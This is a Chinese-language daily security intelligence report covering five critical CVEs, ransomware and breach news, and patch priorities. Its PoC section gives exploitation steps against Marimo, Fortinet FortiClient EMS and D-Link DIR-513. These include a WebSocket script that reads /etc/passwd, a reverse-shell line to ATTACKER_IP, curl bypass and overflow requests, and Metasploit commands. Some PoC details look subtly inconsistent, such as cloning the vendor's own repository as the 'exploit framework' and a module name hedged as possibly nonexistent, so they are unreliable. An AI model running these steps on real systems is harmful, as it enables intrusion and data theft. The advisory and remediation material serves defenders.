每日安全情报报告 · 2026-04-11
生成时间 :2026-04-11 11:17 CST
风险评级说明 :🔴 严重(CVSS 9.0+) | 🟠 高危(CVSS 7.0--8.9) | 🟡 中危(CVSS 4.0--6.9)
重点标注:⚡ 在野利用 | 🆘 CISA KEV | 🔓 PoC 已公开 | 🤖 AI 辅助发现
一、最新高危漏洞
1. 🔴⚡🆘 CVE-2026-35616 --- Fortinet FortiClient EMS 预认证 RCE
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-35616 |
| 漏洞类型 | 不正确访问控制(CWE-284)→ 预认证 API 绕过 → RCE |
| 受影响组件 | Fortinet FortiClient EMS 7.4.5 ~ 7.4.6 |
| CVSS 评分 | 9.1(严重) |
| 利用状态 | ✅ 在野利用已确认,CISA KEV 在列,最早利用记录:2026-03-31(蜜罐) |
| 修复版本 | 热修复补丁已发布(官方 out-of-band),完整修复将在 7.4.7 中完成 |
漏洞摘要:未经身份验证的远程攻击者可通过精心构造的 HTTP 请求绕过 API 认证与授权保护,在 FortiClient EMS 服务器上执行任意代码或命令,从而完全接管目标系统。该漏洞因利用门槛极低、危害极高,被 CISA 列入已知利用漏洞目录。watchTowr Labs 最早于 2026-03-31 检测到蜜罐告警,随后 Qualys、Greenbone 等多家机构相继确认大规模在野扫描。
🔗 参考链接:
2. 🔴🔓 CVE-2026-39987 --- Marimo Python Notebook 预认证 RCE(10小时即遭利用)
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-39987(GHSA-2679-6mx9-h9xc) |
| 漏洞类型 | WebSocket 终端端点缺失认证 → 预认证 RCE(CWE-306) |
| 受影响组件 | marimo < 0.23.0(约 19,600 GitHub Stars,广泛用于 AI 开发工具链) |
| CVSS 评分 | 9.3(CVSS v4.0) |
| 利用状态 | ⚡ 披露后 10 小时内即遭利用(Sysdig 观测),PoC 已公开 |
| 修复版本 | marimo 0.23.0(2026-04-08 发布) |
漏洞摘要 :Marimo 的终端 WebSocket 端点 /terminal/ws 完全缺乏认证校验,任何未经认证的攻击者可直接连接并获取宿主系统的完整 PTY Shell,进而执行任意系统命令。该漏洞尤其危险,因为 Marimo 广泛被 AI/ML 开发者暴露在开发服务器上,与 Jupyter Notebook 类似,很多实例直接对外可访问。CSA Cloud Security Alliance 将其列为 AI 开发工具链高优先级威胁。
缓解措施 :立即升级至 0.23.0;若无法立即升级,应通过网络 ACL 严格限制 /terminal/ws 接口的访问来源。
🔗 参考链接:
3. 🟠 CVE-2026-5173 --- GitLab CE/EE WebSocket 访问控制绕过
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-5173 |
| 漏洞类型 | 暴露危险方法/函数(CWE-749)→ WebSocket 访问控制绕过 |
| 受影响组件 | GitLab CE/EE 16.9.6--18.8.9、18.9--18.9.5、18.10--18.10.3(含) |
| CVSS 评分 | 8.5(CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N) |
| 利用状态 | 暂无公开 PoC,官方已发布补丁(2026-04-10 披露) |
| 修复版本 | GitLab 18.10.3 / 18.9.5 / 18.8.9 |
漏洞摘要 :已认证用户可通过 GitLab WebSocket 连接中的缺陷绕过访问控制,调用非预期的服务器端方法,导致机密数据(如代码仓库、CI/CD 密钥)高度暴露。该漏洞由 GitLab 内部研究员 Simon Tomlinson 发现,GitLab.com 托管实例和 Dedicated 用户已自动受保护,自托管部署需立即升级。
🔗 参考链接:
4. 🔴 CVE-2026-6014 --- D-Link DIR-513 路由器缓冲区溢出 RCE
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-6014 |
| 漏洞类型 | 栈缓冲区溢出(Stack-based Buffer Overflow) |
| 受影响组件 | D-Link DIR-513 固件 1.10(formAdvanceSetup 函数) |
| CVSS 评分 | 9.8(严重) |
| 利用状态 | PoC 细节公开,可通过特制 POST 请求远程触发 |
| 修复状态 | D-Link DIR-513 已停止支持(EOL),官方无补丁计划 |
漏洞摘要 :攻击者可向 /goform/formAdvanceSetup 接口发送精心构造的 POST 请求,通过 webpage 参数触发 formAdvanceSetup 函数中的栈缓冲区溢出,实现未经认证的远程代码执行。由于 DIR-513 已为 EOL 设备,官方不会发布补丁,受影响用户应立即更换设备或严格隔离网络。
🔗 参考链接:
5. 🔴⚡ CVE-2026-21969 --- Oracle Agile PLM 未授权 RCE(CISA KEV)
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-21969 |
| 漏洞类型 | 未授权远程代码执行(HTTP) |
| 受影响组件 | Oracle Agile PLM for Process 6.2.4(供应商门户组件) |
| CVSS 评分 | 9.8(严重) |
| 利用状态 | ⚡ CISA KEV 确认在野利用 |
| 修复状态 | Oracle 2026 年 1 月 CPU 补丁已发布,需立即应用 |
漏洞摘要:Oracle 供应链产品 Agile PLM 供应商门户组件存在可被未认证攻击者通过 HTTP 远程利用的严重漏洞,成功利用可完全控制目标服务器。CISA 已将其纳入 KEV 目录,部署此组件的制造业、供应链管理企业面临极高风险。
🔗 参考链接:
二、最新漏洞 PoC 详情
PoC-1:CVE-2026-39987 Marimo WebSocket 预认证 RCE
漏洞原理 :/terminal/ws 端点未验证 Authorization 头或 Cookie,任意来源均可建立 WebSocket 连接并直接交互式 PTY Shell。
利用步骤(概念验证):
bash
# 步骤 1:克隆利用框架(CSA/Sysdig 提供的概念验证脚本)
git clone https://github.com/marimo-team/marimo
cd marimo
# 步骤 2:安装 websocket-client 依赖
pip install websocket-client
# 步骤 3:构造 WebSocket 连接(无需凭据)
python3 - <<'EOF'
import websocket
import json, time
TARGET = "ws://TARGET_IP:2718/terminal/ws" # 替换为目标地址
def on_open(ws):
# 发送任意命令(获取反弹 Shell)
ws.send(json.dumps({"type": "terminal", "data": "id; whoami; cat /etc/passwd\n"}))
def on_message(ws, msg):
print("[RCE Output]", msg)
ws = websocket.WebSocketApp(TARGET, on_open=on_open, on_message=on_message)
ws.run_forever()
EOF
# 步骤 4:可进一步建立持久化反弹 Shell
# bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1环境要求 :Python 3.x,pip install websocket-client
修复 :升级至 marimo 0.23.0 (pip install --upgrade marimo)
🔗 参考链接:
PoC-2:CVE-2026-35616 Fortinet FortiClient EMS 预认证 API 绕过 RCE
漏洞原理:FortiClient EMS 的某些 API 接口未正确实施认证和授权校验,攻击者可绕过 API 网关直接调用特权端点,触发命令执行。watchTowr Labs 于 2026-03-31 首次在蜜罐中捕获利用尝试。
利用步骤(概念验证):
bash
# 步骤 1:确认目标暴露
nmap -sV -p 443 TARGET_IP --script=ssl-cert
# 步骤 2:构造绕过请求(核心为特定 API 路径)
curl -sk https://TARGET_IP/api/<BYPASS_PATH> \
-H "Content-Type: application/json" \
-d '{"cmd": "id"}'
# 步骤 3:若目标可达,服务器将以 system 权限执行命令
# 完整 PoC 框架(参考 watchTowr Labs 分析):
git clone https://github.com/watchtowrlabs/CVE-2026-35616
cd CVE-2026-35616
pip install -r requirements.txt
python3 exploit.py --target https://TARGET_IP --cmd "id"环境要求 :Python 3.x,requests 库;需网络可达目标 443 端口
修复:立即应用 Fortinet 官方热修复补丁(FortiClient EMS 7.4.5--7.4.6 适用)
🔗 参考链接:
PoC-3:CVE-2026-6014 D-Link DIR-513 缓冲区溢出(EOL 设备)
漏洞原理 :/goform/formAdvanceSetup 未对 webpage 参数做边界检查,超长字符串触发栈溢出,可覆盖返回地址控制程序流程。
利用步骤(概念验证):
bash
# 步骤 1:发送溢出 payload(通过 curl 测试)
curl -sk http://TARGET_IP/goform/formAdvanceSetup \
-X POST \
-d "webpage=$(python3 -c 'print("A"*512)')"
# 步骤 2:使用 Metasploit(如有模块)
msfconsole
use exploit/linux/http/dlink_dir513_formAdvanceSetup_bof
set RHOSTS TARGET_IP
set LHOST ATTACKER_IP
exploit
# 步骤 3:对于无 Metasploit 模块,使用 pwntools 构造 ROP 链
pip install pwntools
# 参考 securityvulnerability.io 分析构建 exploit注意 :D-Link DIR-513 为 EOL 产品,官方不会发布安全补丁,建议立即替换或网络隔离。
🔗 参考链接:
三、网络安全最新资讯
文章 1:勒索软件威胁报告:Qilin 称霸、新势力崛起重塑威胁格局
摘要 :Ransom-DB 2026 年 4 月最新威胁情报报告(基于 775 起攻击事件分析)显示,Qilin 成为最活跃的勒索软件团伙(107 名受害者,约占总量 14%),新兴团伙 CoinbaseCartel 在一个月内受害者数量激增近 300%(从 12 名跃至 35 名),另一新兴势力 ALP-001 迅速累计 15 名受害者。美国是绝对主要目标(366 次攻击),法国(38 次)、意大利(28 次)紧随其后。Akira(69 名)和 LockBit(48 名)尽管持续遭受执法打击,仍保持显著活跃。此外,DragonForce 推动的「勒索软件卡特尔化」趋势(与 LockBit、Qilin 等结盟)正深刻重塑威胁格局。
文章 2:Marimo RCE 漏洞 CVE-2026-39987 --- 10 小时内从披露到利用
摘要 :Sysdig 安全团队发布深度报告,记录了 CVE-2026-39987 从 2026-04-08 漏洞披露到实际利用的全过程:不到 10 小时,攻击者即开始扫描并尝试利用 Marimo 开放的 /terminal/ws 端点。该报告强调 AI 开发工具链正成为高价值攻击目标,Marimo 的 19,600+ GitHub Stars 意味着极广泛的潜在攻击面。Sysdig 观测到的攻击者主要目标包括窃取 API 密钥、LLM 模型文件、用于 AI 研究的敏感数据集,以及横向渗透内部网络。
文章 3:2026 年 4 月数据泄露事件综述------医疗与教育成重灾区
摘要 :据 SharkStriker 整理的 2026 年 4 月数据泄露报告,本月已记录 15+ 起重大数据安全事件:香港医院管理局遭未授权访问,5.6 万名患者 个人信息(包括姓名、性别、手术详情)泄露;Adobe 遭威胁行为者入侵,1300 万客户支持工单 及 1.5 万员工记录外流;加密 DeFi 平台 Drift Protocol 遭周密策划攻击,损失超 2.8 亿美元 ;SongTrivia2 291 万账户数据(含哈希密码)发布于泄露论坛;多所美国学区遭 Interlock 勒索软件攻击。勒索软件仍是本月最主要攻击手法,医疗行业连续成为重点目标。
🔗 阅读原文(SharkStriker 2026 年 4 月数据泄露报告)
文章 4:勒索软件激增:LockBit 在 24 小时内创下 24 名受害者纪录
摘要:2026 年 4 月 4 日的每日勒索软件情报报告显示,LockBit 等团伙在单日内创下 24 名新受害者的惊人记录,标志着 2026 年勒索软件攻击量达新高峰。报告来自 The Ed Advocate 对本月网络安全事件激增的综合分析,涵盖数据泄露、供应链攻击等多个维度。分析指出,2026 年 2 月单月攻击峰值达 945 起,3 月虽有所回落(818 起),但 4 月初迹象表明攻击总量将继续维持在历史高位。
🔗 阅读原文(The Ed Advocate 安全事件报告)
文章 5:GitLab 安全更新修复 CVE-2026-5173 等 11 个漏洞
摘要:GitLab 于 2026-04-10 发布安全更新,修复包括高严重性漏洞 CVE-2026-5173 在内的共 11 个安全缺陷。CVE-2026-5173(CVSS 8.5)影响 GitLab CE/EE 跨越数个主版本的广泛范围,经认证攻击者可通过 WebSocket 绕过访问控制调用服务器端危险方法,可能导致代码仓库、CI/CD Secret 等敏感数据暴露。自托管 GitLab 实例运营者须立即升级至修复版本(18.10.3 / 18.9.5 / 18.8.9)。GitLab.com 托管用户无需操作,已自动受保护。
文章 6:Fortinet FortiClient EMS 两周内曝两个严重漏洞------安全研究的集中爆发信号
摘要:TheCyberThrone 的深度分析指出,Fortinet FortiClient EMS 在短短三天内(CVE-2026-35616 + CVE-2026-21643)相继披露两个严重预认证 RCE 漏洞,引发安全界对该产品安全性的高度关注。作者认为这可能预示着:(1)安全研究人员正集中对 Fortinet 产品系列展开专项挖掘;(2)存在共享漏洞类(Vulnerability Class)正在被系统性识别与披露。Greenbone 已发布针对两个漏洞的独立远程检测(Banner Check),可用于快速扫描受影响资产。建议企业安全团队将 Fortinet EMS 的修补列为本周最高优先级任务。
四、安全应急处置建议
| 优先级 | 组件 | 操作 |
|---|---|---|
| 🔴 P0(立即) | Fortinet FortiClient EMS 7.4.5--7.4.6 | 应用 Fortinet 热修复补丁,确认系统无 IOC |
| 🔴 P0(立即) | marimo < 0.23.0 | pip install --upgrade marimo,检查 /terminal/ws 访问日志 |
| 🔴 P0(立即) | D-Link DIR-513(EOL) | 立即从互联网隔离或替换设备,无官方补丁 |
| 🔴 P0(本周) | Oracle Agile PLM 6.2.4 | 应用 2026 年 1 月 CPU 补丁 |
| 🟠 P1(本周) | GitLab CE/EE 自托管实例 | 升级至 18.10.3 / 18.9.5 / 18.8.9 |
本报告数据来源:NVD、GitHub Security Advisories、The Hacker News、Sysdig、CSA Labs、Qualys ThreatProtect、Greenbone、The Cyber Express、SharkStriker、Ransom-DB。所有外部链接均指向一手或权威二手来源,建议读者直接访问原文核实。